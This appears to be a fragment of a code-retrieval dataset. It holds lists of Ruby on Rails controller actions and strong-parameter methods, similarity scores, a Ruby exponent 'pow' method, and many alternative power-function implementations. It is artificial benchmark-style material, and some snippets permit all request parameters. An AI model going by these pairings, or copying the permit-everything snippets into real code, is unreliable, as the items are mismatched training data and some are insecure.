"def create\n @project = Project.new(params[:project])\n @project.creator_id = current_user.id\t \n respond_to do |format|\n if @project.save\n @project.users << current_user\n format.html { redirect_to project_path(@project), notice: 'Project was successfully created.' }\n format.json { render json: @project, status: :created, location: @project }\n else\n @main_projects = Project.roots.where(creator_id: @project.creator_id)\n format.html { render action: \"new\" }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = current_user.projects.build(project_params)\n @project.memberships.new(user: current_user,role:'Creator')\n respond_to do |format|\n if @project.save\n format.html { redirect_to @project, notice: 'Project was successfully created.' }\n format.json { render :show, status: :created, location: @project }\n else\n format.html { render :new }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n service_result = Organizers::BuildJoinTableObjects.call(project_params, 'project', :create)\n @project = service_result.main_object\n\n if service_result.failure?\n render json: {errors: errors_as_array_hash(service_result.message)}, status: :unprocessable_entity\n else\n render :show, status: :created, location: @project\n end\n end",
"def create\n if !current_user\n respond_to do |format|\n format.html { redirect_to '/competitions/new' }\n end\n return\n end\n\n @competition = Competition.new(competition_params)\n @competition.creator_id = current_user.id\n respond_to do |format|\n if @competition.save\n @competition.create_activity :create, owner: current_user\n format.html { redirect_to @competition, notice: 'Competition was successfully created.' }\n format.json { render :show, status: :created, location: @competition }\n else\n format.html { render :new }\n format.json { render json: @competition.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n\n @project = Project.new(project_params)\n @project.user_id = current_user.id ? current_user.id : 0\n @project.is_enabled = Constants::DISABLED\n @project.status = Constants::NEW\n\n respond_to do |format|\n if @project.save\n format.html { redirect_to @project, notice: 'Project was successfully created.' }\n format.json { render :show, status: :created, location: @project }\n else\n format.html { render :new }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = current_user.projects.new(project_params)\n if @project.save\n render :show\n else\n render json: { errors: @project.errors }\n end\n end",
"def create\n @project = current_user.projects.build(project_params)\n\n respond_to do |format|\n if @project.save\n format.html { redirect_to root_path, notice: 'Enhorabuena! Tienes un nuevo proyecto. A trabajar!' }\n format.json { render :show, status: :created, location: @project }\n else\n format.html { render :new }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = Project.new(project_params)\n @project.user_id = current_user.id\n\n respond_to do |format|\n if @project.save\n format.html { redirect_to @project, notice: 'Project was successfully created.' }\n format.json { render :show, status: :created, location: @project }\n else\n format.html { render :new }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = Project.new(params[:project])\n\n respond_to do |format|\n if @project.save\n format.json { render :json => @project, :status => :created, :location => @project }\n format.html { redirect_to(projects_path) }\n else\n format.html { render :action => \"new\" }\n format.json { render :json => @project.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def new_link\n @project = Project.new(user_id: current_user.id)\n fetch_projects\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @project }\n end\n end",
"def create\n\t @user = User.find(current_user)\n\t @clients = Client.all\n\t @projects = Project.all\n\t @places = Place.all\n\t @types = Type.all\n\t @responsibles = Responsible.all\n\t @task = @user.tasks.create(task_params)\n\n\t redirect_to task_path(@tasks) \n\n end",
"def create\n @project = Project.new(project_params)\n @project.user_id = current_user.id\n respond_to do |format|\n if @project.save\n format.html { redirect_to @project, notice: 'Project was successfully created.' }\n format.json { render :show, status: :created, location: @project }\n else\n format.html { render :new }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = Project.new(project_params)\n @project.user_id = current_user.id\n respond_to do |format|\n if @project.save\n format.html { redirect_to @project, notice: 'Project was successfully created.' }\n format.json { render :show, status: :created, location: @project }\n else\n format.html { render :new }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = Project.new(project_params.merge(user_id: current_user.id))\n\n respond_to do |format|\n if @project.save\n format.json { render :show, status: :created, location: @project }\n else\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = current_user.projects.create(params[:project] )\n respond_to do |format|\n if @project.save\n format.html { redirect_to user_project_path current_user.id,@project.id }\n else\n render 'new', :message => \"there is some error\"\n end\n end\n end",
"def create\n @project = TaskTracker::Project.new(project_params)\n @project.fractal_interface = @user.task_tracker_interface\n\n if @project.save\n render :show, status: :created, location: @project\n else\n render json: @project.errors, status: :unprocessable_entity\n end\n end",
"def create\n @project = Project.new(project_params)\n respond_to do |format|\n if @project.save\n format.html { redirect_to projects_path, notice: 'Project was successfully created.' }\n format.json { render :show, status: :created, location: projects_path }\n else\n @companies = Company.none\n format.html { render :new }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = @user.projects.create(project_params)\n\n # Save and redirect to user projects with a notice at the top saying that the project has been created\n\n if @project.save\n redirect_to(user_projects_path(@project), notice: 'Project was successfully created.')\n else\n render action: 'new'\n end\n end",
"def create\n @project = Project.new(project_params)\n @project.lead_id = current_user.id\n @project.workspace_id = params[:workspace_id]\n if @project.save\n 5.times do\n Task.create(name: \"New Task\", creator_id: current_user.id, workspace_id: current_user.homespace_id, project_id: @project.id)\n end\n\n render :show, status: :created\n else\n render json: @project.errors, status: :unprocessable_entity\n end\n end",
"def create\n @project = Project.new(params[:project])\n @project.account_id = current_user.account_id\n respond_to do |format|\n if @project.save\n format.html { redirect_to(projects_path, :notice => 'Project was successfully created.') }\n format.xml { render :xml => @project, :status => :created, :location => @project }\n else\n format.html { render :action => \"new\", :error => 'Erro' }\n format.xml { render :xml => @project.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n @project = Project.new(project_params)\n @project.institute = current_institute\n \n respond_to do |format|\n if @project.save\n format.html { redirect_to add_path(@project), notice: 'Project was successfully created.' }\n format.json { render :add, status: :created, location: @project }\n else\n format.html { render :new }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = Project.new(params[:project])\n @project.user_id = current_user.id;\n\n respond_to do |format|\n if @project.save\n format.html { redirect_to edit_project_path(@project) }\n format.xml { render :xml => @project, :status => :created, :location => @project }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @project.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create_activity\n player = Player.find_or_create_by(email:req_params[:email])\n project = Project.find_by(name:req_params[:project])\n event = req_params[:event]\n count = req_params[:count]\n @activity = Activity.get_activity_type(player,event,project,count)\n\n end",
"def create\n @project = Project.new(params[:project])\n\n respond_to do |format|\n if @project.save\n format.html { redirect_to(@project, :notice => 'Project was successfully created.') }\n format.json { render :json => @project, :status => :created, :location => @project }\n else\n format.html { render :action => \"new\" }\n format.json { render :json => @project.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n @project = Project.new(project_params)\n @project.project_developers.new(developer_id: current_user.id, is_creator: true)\n respond_to do |format|\n if @project.save\n format.html { redirect_to add_developer_project_url(@project), notice: 'Project was successfully created.' }\n format.json { render :show, status: :created, location: @project }\n else\n format.html { render :new }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = Project.new(project_params)\n @project.user = current_user\n\n respond_to do |format|\n if @project.save\n format.html { redirect_to @project, notice: 'Project was successfully created.' }\n format.json { render :show, status: :created, location: @project }\n else\n format.html { render :new }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def index\n @projects = current_user.projects.order(created_at: :desc).all\n @new_project = Project.new\n @new_task = Task.new\n end"
] |
[
"0.7295849",
"0.72820836",
"0.72768223",
"0.7230288",
"0.7114854",
"0.7112128",
"0.70823723",
"0.70475775",
"0.7026554",
"0.7024975",
"0.69616765",
"0.6776181",
"0.675668",
"0.6748249",
"0.67168736",
"0.66727144",
"0.66511714",
"0.66415524",
"0.66052186",
"0.660399",
"0.6602975",
"0.6596937",
"0.65954643",
"0.65910155",
"0.65844244",
"0.65750647",
"0.65720475",
"0.65438956",
"0.65410864",
"0.6539445",
"0.65266705",
"0.65082175",
"0.65026367",
"0.6499207",
"0.64845693",
"0.6482182",
"0.6460701",
"0.64473635",
"0.64452624",
"0.64361686",
"0.6436027",
"0.6431248",
"0.64294755",
"0.6427523",
"0.64243203",
"0.6413714",
"0.64073193",
"0.6404624",
"0.6404439",
"0.64019835",
"0.6397554",
"0.6393942",
"0.6392209",
"0.63908756",
"0.63908446",
"0.63886005",
"0.6386201",
"0.6382398",
"0.6382266",
"0.63820374",
"0.6380272",
"0.63789773",
"0.6378433",
"0.6374581",
"0.63745666",
"0.6366262",
"0.6364617",
"0.6361371",
"0.6358269",
"0.63443553",
"0.6341668",
"0.6341341",
"0.63397443",
"0.63388026",
"0.63386184",
"0.6337114",
"0.6332951",
"0.6329459",
"0.63294405",
"0.6321161",
"0.6311213",
"0.63083726",
"0.6308133",
"0.63039434",
"0.6292496",
"0.6292496",
"0.62919325",
"0.62913245",
"0.6272575",
"0.62701696",
"0.6268399",
"0.6263885",
"0.6263164",
"0.6260567",
"0.62562066",
"0.62551105",
"0.6252435",
"0.6244437",
"0.6243049",
"0.62428665"
] |
0.7051288
|
7
|
Never trust parameters from the scary internet, only allow the white list through.
|
def search_params_user
params.require(:search).permit(:handle, :first_name, :last_name, :email)
end
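A minimal sketch of how the whitelist above behaves (assuming the actionpack gem is available; the sample keys are illustrative, not from the source): any key outside the permit list, such as :admin below, is silently dropped.

require "action_controller"

params = ActionController::Parameters.new(
  search: { handle: "jo", first_name: "Jo", admin: true }
)
safe = params.require(:search).permit(:handle, :first_name, :last_name, :email)
safe.to_h # => { "handle" => "jo", "first_name" => "Jo" } -- :admin was filtered out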
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def strong_params\n params.require(:user).permit(param_whitelist)\n end",
"def strong_params\n params.require(:listing_member).permit(param_whitelist)\n end",
"def allow_params_authentication!; end",
"def allowed_params\n ALLOWED_PARAMS\n end",
"def default_param_whitelist\n [\"mode\"]\n end",
"def param_whitelist\n [:role, :title]\n end",
"def expected_permitted_parameter_names; end",
"def safe_params\n params.except(:host, :port, :protocol).permit!\n end",
"def strong_params\n params.require(:team_member).permit(param_whitelist)\n end",
"def permitir_parametros\n \t\tparams.permit!\n \tend",
"def strong_params\n params.require(:community).permit(param_whitelist)\n end",
"def permitted_strong_parameters\n :all #or an array of parameters, example: [:name, :email]\n end",
"def strong_params\n params.require(:education).permit(param_whitelist)\n end",
"def restricted_params\n #params.require(self.controller_name.classify.underscore.to_sym).permit([])\n raise(\"No strong params set, override restricted_params method in your controller. E.g. params.require(:model).permit(:attribute1, :attribute2)\")\n end",
"def allowed_params\n params.require(:user).permit(:username, :email, :password, :password_confirmation)\n end",
"def param_whitelist\n [:rating, :review]\n end",
"def param_whitelist\n whitelist = [\n :username, :name,\n :parent_id,\n :headline, :description, :video,\n :policy, :signup_mode, :category,\n :website, :facebook, :twitter, :linkedin,\n :founded_at,\n privacy: [\n :events,\n :resources\n ],\n permission: [\n :profile,\n :members,\n :children,\n :statistics,\n :posts,\n :listings,\n :resources,\n :events\n ],\n location: [\n :description,\n :street,\n :city,\n :state,\n :zip,\n :country,\n :latitude,\n :longitude\n ]\n ]\n \n if action_name === 'update'\n whitelist.delete(:parent_id)\n unless current_user.role_in(@community) === 'owner'\n whitelist.delete(:privacy)\n whitelist.delete(:permission)\n end\n end\n \n whitelist\n end",
"def param_whitelist\n if @user.present? && current_user != @user\n return [:followed]\n end\n \n whitelist = [\n :username, :email, :password,\n :first_name, :last_name,\n :birthday, :gender,\n :headline, :biography, :ask_about, :focus,\n :website, :facebook, :linkedin, :twitter, :github,\n roles: [],\n skills: [],\n interests: [],\n privacy: { contact: [] },\n location: [\n :description,\n :street,\n :city,\n :state,\n :zip,\n :country,\n :latitude,\n :longitude\n ]\n ]\n \n if action_name === 'update'\n whitelist.delete(:email)\n whitelist.delete(:password)\n end\n \n whitelist\n end",
"def user_params \n \tparams.require(:user).permit(:name, :email, :password, :password_confirmation)# preventing CSTR\n end",
"def user_params\n params.permit(:name, :phoneNumber, :address, :postalCode, :local, :link, :counter, :latitude, :longitude) \n end",
"def valid_params_request?; end",
"def strong_params\n params.require(:experience).permit(param_whitelist)\n end",
"def trim_whitelisted(params, whitelist)\n # remove any parameters that are not whitelisted\n params.each do |key, value|\n # if white listed\n if whitelist.include? key\n # strip the parameters of any extra spaces, save as string\n params[key] = value.to_s.strip\n else\n # delete any unauthorized parameters\n params.delete key\n end\n end\n params\n end",
"def whitelist_url_params\n params.require(:whitelist_url).permit(:domain)\n end",
"def allowed_params\n params.require(:allowed).permit(:email)\n end",
"def permitted_params\n []\n end",
"def trim_whitelisted(params, whitelist)\n # remove any parameters that are not whitelisted\n params.each do |key, value|\n # if white listed\n if whitelist.include? key\n # strip the parameters of any extra spaces, save as string\n params[key] = value.to_s.strip\n else\n # delete any unauthorized parameters\n params.delete key\n end\n end\n params\n end",
"def safe_params\n params.permit(:id, :name, :origin, :emails => []); #emails is an array\n end",
"def query_param\n\t\tparams.permit(:first_name, :last_name, :phone)\n\tend",
"def strong_params\n params.require(:success_metric).permit(param_whitelist)\n end",
"def devise_filter\r\n logger.debug(\"In devise_filter =>PARAMS: #{params.inspect}\")\r\n\r\n # White list for sign_up\r\n devise_parameter_sanitizer.for(:sign_up) { |u| u.permit(user_whitelist) }\r\n\r\n # White list for account update\r\n devise_parameter_sanitizer.for(:account_update) { |u| u.permit(user_whitelist, :current_password) }\r\n\r\n # White list for Invitation creation\r\n devise_parameter_sanitizer.for(:invite) { |u| u.permit(:account_type, :email, :invitation_token)}\r\n\r\n # White list for accept invitation\r\n devise_parameter_sanitizer.for(:accept_invitation) { |u| u.permit(user_whitelist, :invitation_token)}\r\n\r\n end",
"def whitelisted_user_params\n params.require(:user).\n permit( :first_name, :last_name, :email,:password,:password_confirmation,:birthday,:gender)\n end",
"def user_params\n ActionController::Parameters.permit_all_parameters = true\n params.require(:user) #.permit(:name, :surname, :phone, :password, :email, :time_zone)\n end",
"def strong_params\n params.require(:metric_change).permit(param_whitelist)\n end",
"def safe_params\n params.require(:user).permit(:name)\n end",
"def get_params\n\t\treturn ActionController::Parameters.new(self.attributes).permit(\"account_id\", \"title\", \"category\", \"introduction\", \"tags\", \"segment_type\", \"visible\", \"status\", \"main_image\")\n\tend",
"def grant_params\n @whitelisted = params.require(:grant).permit(:name, :description, :agency_id, :acronym)\n end",
"def check_params; true; end",
"def param_whitelist\n whitelist = [\n :description,\n :progress,\n :kpi_id\n ]\n \n unless action_name === 'create'\n whitelist.delete(:kpi_id)\n end\n \n whitelist\n end",
"def quote_params\n params.permit!\n end",
"def valid_params?; end",
"def paramunold_params\n params.require(:paramunold).permit!\n end",
"def user_params\n\t\tparams.permit(:nickname, :avatar, :description, :password, :gender, :birthday, :email, :phone, :qq_id, :wechat_id)\n\tend",
"def filtered_parameters; end",
"def user_params\n params.permit(\n \t:id,\n \t:email, \n \t:first_name, \n \t:last_name, \n \t:password, \n \t:confirm_token, \n \t:phone_number,\n \t:facebook_link,\n \t:car_model,\n \t:license_plate)\n end",
"def filtering_params\n params.permit(:email, :name)\n end",
"def check_params\n true\n end",
"def wx_public_params\n params.require(:wx_public).permit(:nickname, :manager, :alias)\n end",
"def allowed_params\n params.require(:user).permit(:email, :password, :role, :first_name, :last_name, :password_confirmation)\n end",
"def allowed_params\n params.require(:user).permit(:email, :password, :role, :first_name, :last_name, :password_confirmation)\n end",
"def listing_params\n\t\tparams.permit(:address, :transit_info, :rules, :other_info, :lat, :lng)\n\tend",
"def social_account_params\n\t\t\tparams.require(:social_account).permit!\n\t\tend",
"def safe_params\n resurce_name = self.class.resource_name\n params_method_name = \"#{resurce_name}_params\".to_sym\n if params[resurce_name]\n if respond_to?(params_method_name) || private_methods.include?(params_method_name)\n send(params_method_name)\n else\n raise ActiveModel::ForbiddenAttributesError, \"Please, define the '#{params_method_name}' method in #{self.class.name}\"\n end\n end\n end",
"def url_params\n params.require(:url).permit(:short_url, :original_url, :clicks, :ip_addresses)\n end",
"def user_params\n params.require(:user).permit(:uri, :username, :password, :realname, :email, :publicvisible)\n end",
"def model_params\n\t\tparams.require(:manager).permit(\n\t :user_name,\n :password,\n :email,\n \t\t\t)\n\tend",
"def article_params_whitelist\n params.require(:article).permit(:title, :description, category_ids: [])\n end",
"def college_whitelist_params\n params.require(:college_whitelist).permit(:status)\n end",
"def active_code_params\n params[:active_code].permit\n end",
"def filtering_params\n params.permit(:email)\n end",
"def valid_params(params)\n params.permit(:user_id, :photo_id, :originX, :originY, :width, :height)\n end",
"def ip_address_params\n\t\t\tparams.require(:ip_address).permit!\n end",
"def pull_request_params\n whitelist = [\n :url,\n :id,\n :html_url,\n :diff_url,\n :patch_url,\n :issue_url,\n :number,\n :state,\n :locked,\n :title\n ]\n params.require(:pull_request).permit(whitelist)\n end",
"def reserved_params\n params.require(:reserved).permit(:name, :email, :pax, :address, :KTP, :title)\n end",
"def post_params\n if current_user.admin? \n params.permit(:title, :body, :city, :country, :gps_location, :privacy, :visible, :latitude, :longitude, images: [], files: [])\n else \n params.permit(:title, :body, :city, :country, :gps_location, :privacy,:latitude, :longitude, images: [], files: [])\n end \n end",
"def list_params\n params.permit(:name)\n end",
"def filter_parameters; end",
"def filter_parameters; end",
"def vineyard_params\n params.permit(:vineyard_name, :email, :website_url, :phone, :address, :city, :region, :postcode, :country, :specialty, :description, :pet_friendly, :holiday, :tours, :events, :family_friendly, :cover_image, :image_one, :image_two, :image_three, :image_four, :user_id, :base64)\n end",
"def available_activity_params\n # params.require(:available_activity).permit(:type,:geometry,:properties)\n whitelisted = ActionController::Parameters.new({\n type: params.require(:available_activity)[:type],\n geometry: params.require(:available_activity)[:geometry].try(:permit!).to_h,\n properties: params.require(:available_activity)[:properties].try(:permit!).to_h\n }).try(:permit!)\n end",
"def user_params\n params.permit(:name, :username, :email, :password, :img_url, :bg_url, :coinbank)\n end",
"def user_params_pub\n\t \tparams[:user].permit(:hruid)\n\t end",
"def user_params\n params.permit(:id, :email, :password, :nickname, :status, :avatar, :flat_picture, :flatsharing_id, :member,\n :user, :color, :solde)\n end",
"def validate_search_inputs\n @whitelisted = params.fetch(:user, nil)\n if @whitelisted.blank?\n render_error(400, \"#{I18n.t('general_error.params_missing_key')}\": [I18n.t('general_error.params_missing_value', model: \"review\")])\n return\n else\n @whitelisted = @whitelisted.permit(:name, :uen, :description)\n end\n end",
"def param_whitelist\n [\n :title,\n :description,\n :organization,\n :team_id,\n :started_at,\n :finished_at,\n location: [\n :description,\n :street,\n :city,\n :state,\n :zip,\n :country,\n :latitude,\n :longitude\n ]\n ]\n end",
"def url_whitelist; end",
"def admin_social_network_params\n params.require(:social_network).permit!\n end",
"def filter_params\n params.require(:filters).permit(:letters)\n end",
"def origin_params\n params.permit(:country, :state, :city, :postal_code, :address, :description)\n end",
"def valid_params(params)\n params.permit(:login, :first_name, :last_name, \n :password, :password_confirmation)\n end",
"def sensitive_params=(params)\n @sensitive_params = params\n end",
"def permit_request_params\n params.permit(:address)\n end",
"def user_params\n # Ensure a user can't give themselves admin priveleges\n params.delete(:admin) if current_user.admin?\n params.require(:user).permit(:name, :email, :admin, :image)\n end",
"def secure_params\n params.require(:location).permit(:name)\n end",
"def strong_params\n params.require( :setting ).\n permit( :global_scan_limit, :per_user_scan_limit,\n :target_whitelist_patterns, :target_blacklist_patterns )\n end",
"def question_params\n params.require(:survey_question).permit(question_whitelist)\n end",
"def case_insensitive_params\n params.require(:case_insensitive).permit(:name)\n end",
"def empire_master_no_match_params\n params.require(:empire_master_no_match).permit(:uid, :last_name, :list, :search_date, :double, :source)\n end",
"def maintenance_request_params\n params[:maintenance_request].permit! #allow all parameters for now\n end",
"def unwanted_params\n params.require(:unwanted).permit(:title, :description, :image)\n end",
"def url_params\n params[:url].permit(:full)\n end",
"def backend_user_params\n params.permit!\n end",
"def filter_params\n\t\treturn params[:candidate].permit(:name_for_filter)\n\tend",
"def speed_measurement_params\n\n #fuckit, to lazy to deal with permit crap right now\n ActionController::Parameters.permit_all_parameters = true\n\n params[:speed_measurement]\n end",
"def user_params\n params.permit(:name, :age, :username, :display_photo, :password)\n end",
"def get_params\r\n #params.require(:article).permit(:title, :permalink, :content, :source_site, :introtext, :type_id, :order_by, :searchable, :created_by, :edited_by, :published_by, :published_on, :user_id)\r\n params.require(:article).permit!\r\n\r\n end",
"def pub_params\n params.require(:pub).permit(:name, :description, :phone, :email, :hidden, :city_id, :address)\n end",
"def pass_params\n params[:pass].permit(:name, :price, :description, :colour, :events)\n end",
"def droptraining_params\n params.permit(:training_id,:user_id, :utf8, :authenticity_token, :commit)\n end",
"def person_params\n # params whitelist does *not* include admin, sub, remember_token\n # TBD: share this whitelist with the list used by configuration_permitted_parameters\n # TBD: should current_password be on this list? -- for now, leaving off, since it seems to work without\n # NOTE: do not include 'admin' in this list!\n params.require(:person).permit(\n :name, \n :email, \n :description,\n :password, \n :password_confirmation\n )\n end",
"def parameter_params\n params.require(:parameter).permit(:name, :description, :param_code, :param_value, :active_from, :active_to)\n end"
] |
[
"0.69792545",
"0.6781151",
"0.67419964",
"0.674013",
"0.6734356",
"0.6591046",
"0.6502396",
"0.6496313",
"0.6480641",
"0.6477825",
"0.64565",
"0.6438387",
"0.63791263",
"0.63740575",
"0.6364131",
"0.63192815",
"0.62991166",
"0.62978333",
"0.6292148",
"0.6290449",
"0.6290076",
"0.62894756",
"0.6283177",
"0.6242471",
"0.62382483",
"0.6217549",
"0.6214457",
"0.6209053",
"0.6193042",
"0.6177802",
"0.6174604",
"0.61714715",
"0.6161512",
"0.6151757",
"0.6150663",
"0.61461",
"0.61213595",
"0.611406",
"0.6106206",
"0.6105114",
"0.6089039",
"0.6081015",
"0.6071004",
"0.60620916",
"0.6019971",
"0.601788",
"0.6011056",
"0.6010898",
"0.6005122",
"0.6005122",
"0.6001556",
"0.6001049",
"0.59943926",
"0.5992201",
"0.59909594",
"0.5990628",
"0.5980841",
"0.59669393",
"0.59589154",
"0.5958826",
"0.5957911",
"0.5957385",
"0.5953072",
"0.59526145",
"0.5943361",
"0.59386164",
"0.59375334",
"0.59375334",
"0.5933856",
"0.59292704",
"0.59254247",
"0.5924164",
"0.59167904",
"0.59088355",
"0.5907542",
"0.59064597",
"0.5906243",
"0.5898226",
"0.589687",
"0.5896091",
"0.5894501",
"0.5894289",
"0.5891739",
"0.58860534",
"0.5882406",
"0.587974",
"0.58738774",
"0.5869024",
"0.58679986",
"0.5867561",
"0.5865932",
"0.5864461",
"0.58639693",
"0.58617616",
"0.5861436",
"0.5860451",
"0.58602303",
"0.5854586",
"0.58537364",
"0.5850427",
"0.5850199"
] |
0.0
|
-1
|
Write a method, pow, which takes base and exponent and returns base raised to the exponent power. (No fair using Ruby's base ** exponent notation!).
|
def pow(base, exponent)
result = 1
exponent.times do
  result = base * result
end
result
end
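A brief usage sketch of the method above:

pow(2, 10) # => 1024
pow(5, 0)  # => 1 (with exponent 0 the loop body never runs, so the initial result of 1 is returned)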
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def power(base, exponent)\n return nil if exponent < 0\n\n return 1 if exponent == 0\n\n value = base\n\n (exponent - 1).times do value *= base end\n\n value\nend",
"def power(base,exponent)\n\n return base ** exponent\nend",
"def pow(base, exponent)\n\n result = 1\n\n exponent.times do\n result = result * base\n end\n\n return result\n \n end",
"def power(base, exponent)\n result = 1\n exponent.times { result *= base }\n result\nend",
"def power(base, exponent)\n exponent <= 1 ? base : base * (power base, (exponent - 1))\nend",
"def pow(base,exponent)\n base**exponent\n end",
"def power(base, exponent)\n return (0...exponent).inject(1) { |memo| memo * base } if exponent >= 0\n (exponent...0).inject(1.0) { |memo| memo * 1/base }\nend",
"def power(base, exponent)\n total = 1\n\n # we don't actually need this\n # if exponent == 1\n # total = base\n # elsif exponent == 0\n # total = 1\n # end\n # But what if the exponent were negative?\n\n (exponent.abs).times do\n total = multiply(total, base)\n end\n\n if exponent < 0\n total = (1.0 / total).to_r\n end\n\n total\nend",
"def power(base, exponent)\n if !base.is_a?(Integer) || !exponent.is_a?(Integer)\n return nil\n else \n product = 1\n (1..exponent).each do\n product *= base\n end\n return product\n end\nend",
"def power(base, exponent)\n total = 1\n\n exponent.times do\n total *= base\n end\n\n return total\nend",
"def power(base, exp)\n return base ** exp\nend",
"def exponent_v1(base, power)\n return 1 if power <= 0\n base * exponent_v1(base, power-1)\nend",
"def exponent1(base, power)\n\treturn 1 if power == 0\n\tbase * exponent1(base, power - 1)\nend",
"def exponent_1(base, power)\n\treturn 1 if power == 0\n\tlesser_power = power - 1\n\tbase_to_the_lesser_power = exponent_1(base, lesser_power)\n\tbase * base_to_the_lesser_power\nend",
"def exp(base, exponent)\n return base if exponent == 1\n base * exp(base, exponent-1)\nend",
"def exponentiation(base, power)\n return 1 if power == 0\n base * exponentiation(base, power - 1)\nend",
"def power(base,exponent)\n i = 0\n output = 1\n while i < exponent\n output = output * base\n i += 1\n end\n return output\nend",
"def exp(base, exponent)\n return 1 if exponent.zero?\n\n base * exp(base, exponent - 1)\nend",
"def power(base, power)\r\n base ** multiply(power, 1)\r\nend",
"def power(base,exponent)\n i=1\n output = base\n while i<exponent\n output = output*base\n i += 1\n end\n return output\nend",
"def pow(base, exponent) #(3, 4) ==> 3 * 3 * 3 * 3 = \n return 1 if exponent == 0 \n #return base if exponent == 1\n base * pow(base, exponent - 1)\nend",
"def exp(base, power)\n return 1 if power == 0\n return base if power == 1\n base * exp(base, (power-1))\nend",
"def power(base, exponent)\n i = \n output = 1\n while i <= exponent\n output = output * base\n i += 1\n end \n return output\nend",
"def power(base, exp)\n i = 0\n output = 1\n\n while i < exp\n output *= base\n i += 1\n end\n return output\nend",
"def ui_pow(base, exp)\n result = 1;\n while (exp)\n if (exp & 1)\n result *= base\n end\n exp >>= 1;\n base *= base\n end\n if(exp==0)\n result=base\n end\n return result\nend",
"def power(base, power)\n base ** power\nend",
"def exponent1(base, num)\n return 1 if num == 0\n return base if num == 1\n x = base * exponent1(base, num-1)\n\nend",
"def exponent1(base, power)\n # if power equals zero , then 1 else (base * method(base,power - 1))\n if power == 0\n return 1\n else\n (base * exponent1(base, power - 1))\n end\nend",
"def rec_exp_1(base, power)\nend",
"def rec_exp_2(base, power)\nend",
"def exp1(base, power)\n return 1 if power <= 0\n exp1(base, power - 1) * base\nend",
"def power (num, exponent)\n if exponent == 0\n result = 1\n elsif exponent == 1\n result = num\n else\n result = multiply(num, num)\n (exponent-2).times { result = multiply(result, num) }\n result\n end\nend",
"def power(base, exponent)\n multiply = []\n exponent.times do\n multiply.push(base)\n end\n product = 1\n multiply.each { |i| product *= i}\n puts product\nend",
"def pow(base_num, pow_num)\n result = 1\n pow_num.times do |index|\n result = result * base_num\n end\n\n return result\nend",
"def pow base, p\n base ** p\n end",
"def power_of(num, exponent)\n product = multiply(num, num)\n \n (exponent - 2).times { product *= num }\n\n product\nend",
"def exp_r1 (base, exponent)\n if exponent == 0\n return 1\n else\n base * exp_r1(base, exponent - 1)\n end\nend",
"def exp1(base, power)\n return 1 if power == 0\n base * exp1(base, power - 1)\nend",
"def exp1(base, power)\n return 1 if power == 0\n base * exp1(base, power - 1)\nend",
"def powerI(power, base)\n acc = 1\n power.times { acc *= base }\n return acc\nend",
"def exponentiation(base, exp)\n return nil if exp < 0\n return 1 if exp == 0\n return base if exp == 1\n\n if exp.even?\n (exponentiation(base, exp / 2)**2)\n else\n base * (exponentiation(base, (exp - 1) / 2)**2)\n end\nend",
"def pow(base_num, pow_num)\n result = 1\n pow_num.times do\n result = result * base_num\n end\n return result\nend",
"def power(bas,exponent)\n i = 1\n resultat = bas\n while i < exponent\n resultat *= bas\n i += 1\n end\n return resultat\nend",
"def exp(number, exponent)\n number * (10**exponent)\nend",
"def power_digit_sum(base, exponent)\n\t(2 ** 1000).to_s.split(\"\").inject(0) {|sum, n| sum + n.to_i}\nend",
"def power_of_n(num, exponent)\n num ** exponent\nend",
"def power(num, exponent)\n result = num\n (2..exponent).each { result = multiply(result, num) }\n result\nend",
"def pow (base_num , pow_num)\n results=1\n pow_num.times do \n results*=base_num\n end \n results\nend",
"def calculate_exponent(num, exp)\n\treturn num ** exp\nend",
"def power(num, power)\n\tnum**power\nend",
"def exponentiation_one(base, exp)\n return nil if exp < 0\n return 1 if exp == 0\n return base if exp == 1\n\n base * exponentiation_one(base, exp - 1)\nend",
"def exp(base,exponent)\n p exponent\n return 1 if exponent == 0\n return base if exponent == 1\n if exponent.even?\n result = exp(base,exponent/2)\n result * result\n else\n result = exp(base,(exponent-1)/2)\n base * (result * result)\n end\n\n\nend",
"def exponent; end",
"def exponentiate(number, power)\n power = power.to_int\n puts \"#{number} ** #{power} = #{number ** power}\\n\"\nend",
"def exponent(b, n)\n\nend",
"def exponent(b, n)\n\nend",
"def exponent(b, n)\n\nend",
"def power(number, exponent)\n i = 0\n output = 1\n new_exponent = exponent.round\n if new_exponent < 0\n output = 1/power(number,(new_exponent * -1)).to_f\n return output\n end\n if new_exponent == 0\n return output\n end\n while i < new_exponent\n output = output * number\n i += 1\n end\n return output\nend",
"def power(num, power)\r\n num ** power\r\nend",
"def pow(base, y)\n result = 1\n for i in 0..(y - 1)\n result = result * base\n end\n puts \"\\n#{base}^(#{y}) = #{result}\\n\"\n end",
"def exp1(base, num)\n return 1 if num == 0\n return base if num == 1\n expo = base * exp1(base, num-1)\nend",
